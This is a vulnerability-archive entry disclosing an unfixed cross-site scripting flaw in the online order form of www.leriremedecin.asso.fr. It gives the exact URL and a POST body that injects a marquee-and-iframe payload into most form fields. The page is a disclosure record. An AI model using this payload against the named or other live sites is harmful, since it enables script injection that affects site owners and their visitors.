Security researcher death-angel, has submitted on 06/10/2008 a cross-site-scripting (XSS) vulnerability affecting www.leriremedecin.asso.fr, which at the time of submission ranked 7642154 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 09/04/2010. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 06/10/2008 |
Date published: 09/04/2010 |
Fixed? Mail us! | Status: UNFIXED |
Author: death-angel |
Domain: www.leriremedecin.asso.fr |
Category: XSS |
Pagerank: 7642154 |
URL: http://www.leriremedecin.asso.fr/Boutique/Commande_en_ligne |
POST: title=Madame&firstName="%2F><marquee>xss+death-angel<iframe+src%3D"http%3A%2F%2Fwww.xssed.com"%2F>&l astName="%2F><marquee>xss+death-angel<iframe+src%3D"http%3A%2F%2Fwww.xssed.com"%2F>&building=&number =23&streetType=&streetName="%2F><marquee>xss+death-angel<iframe+src%3D"http%3A%2F%2Fwww.xssed.com"%2 F>&place=&zipCode="%2F><marquee>xss+death-angel<iframe+src%3D"http%3A%2F%2Fwww.xssed.com"%2F>&city=" %2F><marquee>xss+death-angel<iframe+src&countryID=67&email="%2F><marquee>xss+death-angel<iframe+src% 3D"http%3A%2F%2Fwww.xssed.com"%2F>&telephone=&day=&month=&year=&birthday=&how=7&comment="%2F><marque e>xss+death-angel<iframe+src%3D"http%3A%2F%2Fwww.xssed.com"%2F>&newsletter=1&cgv=1&submit.x=48&submi t.y=20 |
Click here to view the mirror
|
|
|